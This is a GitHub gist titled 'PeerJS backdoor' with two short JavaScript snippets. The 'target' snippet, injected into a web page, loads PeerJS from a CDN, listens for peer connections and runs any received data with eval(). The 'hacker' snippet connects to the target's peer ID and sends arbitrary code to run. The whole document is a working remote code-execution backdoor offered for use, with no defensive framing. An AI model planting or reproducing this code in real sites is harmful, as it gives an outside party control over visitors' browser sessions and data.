Created
December 20, 2023 09:06
-
-
Save tripolskypetr/44c6e3c2cd217981df7cd3ae6be65ae2 to your computer and use it in GitHub Desktop.
PeerJS backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// target | |
(function () { | |
const script = document.createElement("script"); | |
script.src = "https://unpkg.com/[email protected]/dist/peerjs.min.js"; | |
script.onload = () => { | |
const peer = new Peer(); | |
peer.on("open", function (id) { | |
console.log(id); | |
peer.on("connection", function (conn) { | |
conn.on("data", function (data) { | |
eval(data); | |
}); | |
}); | |
}); | |
}; | |
document.body.appendChild(script); | |
})(); | |
// hacker | |
(function () { | |
const script = document.createElement("script"); | |
script.src = "https://unpkg.com/[email protected]/dist/peerjs.min.js"; | |
script.onload = () => { | |
const peer = new Peer(); | |
peer.on("open", function (id) { | |
console.log(id); | |
const conn = peer.connect(prompt("id")); | |
document.body.onclick = () => { | |
conn.send(prompt("eval")); | |
}; | |
}); | |
}; | |
document.body.appendChild(script); | |
})(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
backdoor-three-hundred-bucks